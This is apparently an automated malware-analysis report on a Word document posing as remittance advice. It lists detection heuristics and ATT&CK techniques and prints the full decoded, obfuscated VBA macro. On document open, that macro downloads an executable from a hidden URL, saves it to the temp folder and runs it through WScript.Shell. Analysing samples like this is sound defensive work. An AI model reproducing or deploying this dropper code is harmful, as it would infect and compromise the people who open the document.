MALICIOUS
338
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening the document. Critical heuristics indicate the use of WScript.Shell and a Shell() call, suggesting the macro attempts to execute arbitrary commands or download further payloads. The document body presents itself as remittance advice, indicating a lure to trick the user into performing an action, likely related to payment fraud.
Heuristics 11
-
ClamAV: Doc.Dropper.Donoff-5743530-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Donoff-5743530-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Dim gFhrfphULi As String, qqQWMQOv As Integer Set RsRHOxt = CreateObject("WScript.Shell") End Function -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Public Function BLwgX() As Object Set BLwgX = CreateObject("ADODB.Stream") End Function -
CallByName call high OLE_VBA_CALLBYNAMECallByName callMatched line in script
Dim xtxWl As String OxyRpTO = CallByName(StJxh, WoVjdRAKfa, 2) End Function -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
End Function Private Sub Document_Open() Dim ZPDPHnj As Integer -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Fake invoice / payment lure low SE_INVOICE_LUREDocument contains invoice or payment language paired with an action verb — useful context when combined with link, macro, or attachment indicators
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9410 bytes |
SHA-256: e120635caa70ea9e37afb29499d2698984d28df981310822032a308828415916 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
173 of 245 identifiers look randomly generated (e.g. 'D9n8ea6aJgcDGudvCdCQP1RI5pyipWMFD') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function lXiYi() As Integer
hFrQPtBp
iOEGGBQELK
lXiYi = 4779
End Function
Private Sub Document_Open()
Dim ZPDPHnj As Integer
auEprygAY.lKWcTTtPJ
End Sub
Private Sub IyTFndQ(ByVal tWaHbJWa As Integer)
kKhjcbO
If kbFfJcWPDT("5FjTr4lJor1mKl1h1JBVm6sU", 6938) Then
Vvqbl
fCDqvdI
tMRaXX 5233, "c4TFbvaAyIX5rWuREEh8ZkO", 762
End If
End Sub
Private Sub xpDvI(ByVal FwqWu As Integer, ByVal bKQsLfPtT As Integer)
WbFWObBP
End Sub
Private Sub charbjS(ByVal ouZXrRprh As String, ByVal WarvJN As Boolean)
hpyzkXXV "ZzKMg6L0yvZc1f9q6v2PJoAQPV", False, 6811
NhNNP 1698, 8412
If iqsSlw Then
HXncUHot "29PX0LE0fZL864UxOvYjjoi"
KvgAFCY
HSewNUUfX "3um6pEKi48VN7SZDmOp4i4Lai"
Else
eBXHSXxSTm
End If
XPKypJaPJ 6078, True, 3113
End Sub
Attribute VB_Name = "AhMxBWnqtk"
Public Function BLwgX() As Object
Set BLwgX = CreateObject("ADODB.Stream")
End Function
Public Function bAOYIYwzVu() As Object
Dim wdcRVtTy As Integer
Set bAOYIYwzVu = CreateObject("MSXML2.ServerXMLHTTP.6.0")
End Function
Public Function RsRHOxt() As Object
Dim gFhrfphULi As String, qqQWMQOv As Integer
Set RsRHOxt = CreateObject("WScript.Shell")
End Function
Attribute VB_Name = "auEprygAY"
Private Function dZFlZbzB() As String
dZFlZbzB = soCxCNgfM.vEyNPDc("wRe3wspwowrnsr3erBow3dyw", "rw3")
End Function
Private Function EsjjF() As String
Dim KNnxjYxl As Integer
Dim XSqpMFANqW As Boolean
EsjjF = jgIuHteWrZ(NxslbV, gCNEPU, gCNEPU) & wkSHQDT
End Function
Private Sub yUKCDGN(ByVal kNqvTwNQ As String, ByVal VHgEamb As Boolean, ByVal JNSTSTzs As Integer, ByVal YSvyOrq As Variant)
Dim CRUQckgk As Boolean, CwzbrzK As Integer
Set khkEFNwpi = AhMxBWnqtk.BLwgX
IcHxH.pbSzXF 708, soCxCNgfM.vEyNPDc("Taayqpae", "7qa."), 3110, 1, khkEFNwpi
IcHxH.VfBUigVqkN soCxCNgfM.vEyNPDc("OXpresns", "r.Xtsu"), khkEFNwpi
IcHxH.xvkmxtH soCxCNgfM.vEyNPDc("EWrQi3EteE", "3QEN"), 6128, khkEFNwpi, YSvyOrq, rGdFp
IcHxH.YQIiss kNqvTwNQ, 2, bDTFPqASYt, khkEFNwpi
IcHxH.VfBUigVqkN bsfybGhP, khkEFNwpi
End Sub
Private Sub nXiGR()
Dim SPxvjqou As Boolean, OBfNwD As String
On Error GoTo UFFVJKr
jJZPfnZK 2612, EsjjF, yMMoecQyj
sBZbi EsjjF
RPCxFN = "f0hdcBgLhhKoSzKpHR3Fi"
Exit Sub
vkLGZ = 5682
UFFVJKr:
End Sub
Private Function rGdFp() As String
rGdFp = "CnzyqzlK02NiKl6u9f0"
End Function
Private Sub sBZbi(ByVal VVedtni As String)
IcHxH.xvkmxtH SXTEF, 6128, AhMxBWnqtk.RsRHOxt, VVedtni, zAbbQBDn
End Sub
Private Function zAbbQBDn() As String
zAbbQBDn = "mO0qpdr8ltDdA9zhvwHnvXdEfIETVq3qi"
End Function
Private Function jgIuHteWrZ(ByVal mbRPl As String, ByVal oYlYSIynSk As String, ByVal beruZwqxJz As String) As String
Dim RwsXvwx As String
JixRwEJkN = False
Set MJmjj = IcHxH.REnyVsUSe(soCxCNgfM.vEyNPDc("EW7nvFWiHro6Hnm7FeHnFt", "6H47WF"), False, 7872, AhMxBWnqtk.RsRHOxt, soCxCNgfM.vEyNPDc("wPR6Od6CdESwiS", "xdtw6i"))
jgIuHteWrZ = MJmjj(mbRPl)
End Function
Private Function yMMoecQyj() As String
Dim AUjlAPk As Boolean
Dim jdqfOANBzu As Boolean
yMMoecQyj = BFppclZqB
End Function
Private Function SEcuPpcS() As String
NXgcHedZ = "DKva5T1tzt9uNk8v4XRls0dGWsm"
SEcuPpcS = soCxCNgfM.vEyNPDc("S2Ce2nd2", "2Co")
End Function
Private Function BFppclZqB() As String
BFppclZqB = soCxCNgfM.vEyNPDc("hXt8XtpX:X/XX/Xol80c0ayX0f0o0to8g0r8XafX.0c0o0mX/08sy8s08t0e8m/0c0Xa8ch08e/88wXo8r0d.8e8x08e", "0X8")
End Function
Private Function wkSHQDT() As String
Dim osqqg As String
wkSHQDT = PgjYTcLSA
End Function
Private Function bsfybGhP() As String
bsfybGhP = soCxCNgfM.vEyNPDc("Ciliopiske", "tkpi")
End Function
Private Sub cWunX(ByVal IdapnfkR As Integer, ByVal GnovfyogN As Boolean)
nlzlivrN 5254, False, False
bHCdDp True, 2221
dKGQB 8006, True, 7782
If fCAhhnf(9180) Then
XWIMFEtxub False
IXexmLYhXX
VDDMzyez 9562
Else
gcJTlZZrR 2876, False
End If
ihWWxOEu 7730, True, "XoamEjGkrsULGIYVxAdTAtN"
End Sub
Private Function SXTEF() As String
JywcHztmR = "zRHMmUrWttZzZ9pZy0DhYO2ZT"
SXTEF = soCxCNgfM.vEyNPDc("rEWxteWc", "1rWt")
End Function
Private Function xOZypMMv() As String
If pjTUCKd(5843, "WJkEt1QVkfJatERcy") Then
zeMphePZDz 1173, "zWo3eg5qzn72lf0oXj"
zUtoVINdP 2806, "D9n8ea6aJgcDGudvCdCQP1RI5pyipWMFD", 559
jvyLJjMjyn
End If
xOZypMMv = "bNUq5BQ0ZBhpt9kbPuBaAnrch"
End Function
Private Function FQymqif() As String
FQymqif = soCxCNgfM.vEyNPDc("MZPoZziZPllPaPx/5xZ.0ZP P(xcoZmZpxaPtZZiZbZlZe;xx PMZSxIPE ZP9.Px0;PZ PWxinxxdPowPsPP PNPTP P7Z.1x;x PxTrxPixdePxnZt/P5x.P0P)P", "PxZ")
End Function
Private Function Xjuzm() As String
Xjuzm = soCxCNgfM.vEyNPDc("OXpresns", "r.Xtsu")
End Function
Private Sub jJZPfnZK(ByVal tisIc As Integer, ByVal GefBHbzaXv As String, ByVal FaoowUobC As String)
Dim cLion As Integer, QmSSGLrIL As Integer
Set hGAjCtoVF = AhMxBWnqtk.bAOYIYwzVu
vAhuigCxLB = "9xhByeXuU4T8HBZF8Hhk5uhAYB"
IcHxH.SmzXbpy False, soCxCNgfM.vEyNPDc("6GE Ta", " a96S"), False, FaoowUobC, Xjuzm, hGAjCtoVF
IcHxH.YQIiss soCxCNgfM.vEyNPDc("U.sNeTNrN-ANgNTenNt.", "mT.N"), FQymqif, soCxCNgfM.vEyNPDc("SDe3tQKRKeqPuDPePst3HDDeaQd3eKDr", "QPD3K"), hGAjCtoVF
IcHxH.VfBUigVqkN SEcuPpcS, hGAjCtoVF
yUKCDGN GefBHbzaXv, True, 3347, IcHxH.OxyRpTO(hGAjCtoVF, dZFlZbzB)
End Sub
Private Function PgjYTcLSA() As String
PgjYTcLSA = soCxCNgfM.vEyNPDc("/oo86ioeh7h1i8i1bh6on9nbenn41oic3i.iheoxoe", "ohin")
End Function
Public Sub lKWcTTtPJ()
Dim SqJSN As Integer
nXiGR
End Sub
Private Function khqaO() As Integer
WmkFh
cIsPekWV 9366
khqaO = 9266
End Function
Private Function gCNEPU() As String
gCNEPU = "ZsQRpJyqrEfx0pahbORP4CIPxKWxB8"
End Function
Private Function bDTFPqASYt() As String
bDTFPqASYt = soCxCNgfM.vEyNPDc("6Sakbve66T6oFbkibl6e", "6kb")
End Function
Private Function NxslbV() As String
NxslbV = soCxCNgfM.vEyNPDc("ZTEZIMPZ", "ZoWIO")
End Function
Attribute VB_Name = "gfYLB"
Private Sub fCYrmmp(ByVal KHSZKSELI As String)
XHvfGalf
BZbDy False, True, 5361
End Sub
Private Sub meivLAFp()
UKUhJchCfN False
UOlvZCoKSe "lPgLNAgVIX6iGi8oYQ", 3119
BWDat "IBlZXr1cC7xCrTXSY"
End Sub
Private Function EwykVwBOmO(ByVal MPRjdx As String, ByVal PvrVyPhX As String) As Boolean
UiaKS 8628
jalCYyVT
wbAhL 7029
EwykVwBOmO = True
End Function
Private Sub THUJA(ByVal vxUtLeX As Boolean, ByVal oajGKRL As String)
mokZnpH
HulbI "oacgqxYhSECRMY4eq"
End Sub
Public Function dnBNLei(ByVal MvdRYUs As String, ByVal AIRHvAL As String, ByVal GYaCQeX As Integer) As Boolean
Dim nRofJwYlF As Boolean
dnBNLei = InStr(1, AIRHvAL, MvdRYUs)
End Function
Public Function OnRDVW(ByVal WNvRt As String, ByVal GwdDFPw As Integer) As String
Dim KTkUIkFCNQ As Boolean
Dim FAWvHmr As Boolean
OnRDVW = Mid(WNvRt, GwdDFPw, 1)
End Function
Attribute VB_Name = "IcHxH"
Public Function OxyRpTO(ByVal StJxh As Object, ByVal WoVjdRAKfa As String) As Variant
Dim xtxWl As String
OxyRpTO = CallByName(StJxh, WoVjdRAKfa, 2)
End Function
Public Sub YQIiss(ByVal AWdDQXq As Variant, ByVal kUTFuiOT As Variant, ByVal dVNMpzEm As String, ByVal AXtBhR As Object)
CallByName AXtBhR, dVNMpzEm, 1, AWdDQXq, kUTFuiOT
End Sub
Public Sub xvkmxtH(ByVal kfMoXx As String, ByVal KOrQktg As Integer, ByVal oQsYFaipbj As Object, ByVal zSNkARtup As Variant, ByVal pjLwYjHcHG As String)
Dim kpyPvtMf As Boolean, YoAekV As String
CallByName oQsYFaipbj, kfMoXx, 1, zSNkARtup
End Sub
Public Sub VfBUigVqkN(ByVal sqQziJwCV As String, ByVal zQtloNToEj As Object)
Dim WHHPra As Integer, klFXu As Integer
CallByName zQtloNToEj, sqQziJwCV, 1
End Sub
Public Sub SmzXbpy(ByVal ZmiGKjq As Variant, ByVal YMxYm As Variant, ByVal VZqoptNc As Boolean, ByVal ogEFVZ As Variant, ByVal ZxlAx As String, ByVal rYmhaGJjfR As Object)
Dim qgeAaTMvRR As Boolean
OWoNkkz = "pfDcWhis0AOoI5zRyACmudMYD4"
CallByName rYmhaGJjfR, ZxlAx, 1, YMxYm, ogEFVZ, ZmiGKjq
End Sub
Public Function REnyVsUSe(ByVal UqIzKPrw As String, ByVal LCyerT As Boolean, ByVal hRehlfcJ As Integer, ByVal rYmhaGJjfR As Object, ByVal dHMvg As String) As Variant
Set REnyVsUSe = CallByName(rYmhaGJjfR, UqIzKPrw, 2, dHMvg)
End Function
Public Sub pbSzXF(ByVal YwvQDL As Integer, ByVal GHFpuhEmqy As String, ByVal blmJbadm As Integer, ByVal KrfhkIQ As Variant, ByVal CuQNug As Object)
Dim wYgUzAg As Integer, oViydMyrTP As Integer
xAnXsgtN = False
CallByName CuQNug, GHFpuhEmqy, 4, KrfhkIQ
End Sub
Attribute VB_Name = "soCxCNgfM"
Private Function AmBcob() As Boolean
puBqPC False, "wcHmthIEmg8DzeiqikJFtX8aSt"
AmBcob = True
End Function
Private Sub dMsbUxo(ByVal LdovjYvQ As String, ByVal aTrLc As Integer)
oRQsMB
End Sub
Public Function vEyNPDc(ByVal CbYXQ As String, ByVal ESrwfOX As String) As String
Dim UNuqY As Boolean, JgXpwpW As String
For IDypBIHSaE = 1 To Len(CbYXQ)
UNuqY = gfYLB.dnBNLei(gfYLB.OnRDVW(CbYXQ, IDypBIHSaE), ESrwfOX, 638)
MWgdETofR = 5559
If Not UNuqY Then
vEyNPDc = vEyNPDc & gfYLB.OnRDVW(CbYXQ, IDypBIHSaE)
LICDvxAOy = 7085
End If
Next
End Function
Private Function fNLPNyer() As Boolean
RiNRh 3745
fNLPNyer = True
End Function
Private Function oiIXlLkw(ByVal kEGKxM As Integer, ByVal MwVzL As Integer) As String
wzDcvaHzAL "FGu2ctX0CTLhs2iTdp5ZKy"
lLNzEN 414
yvqqniWt 6874, False, True
oiIXlLkw = "2VN10NB0l4aEcke4j1Ius"
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.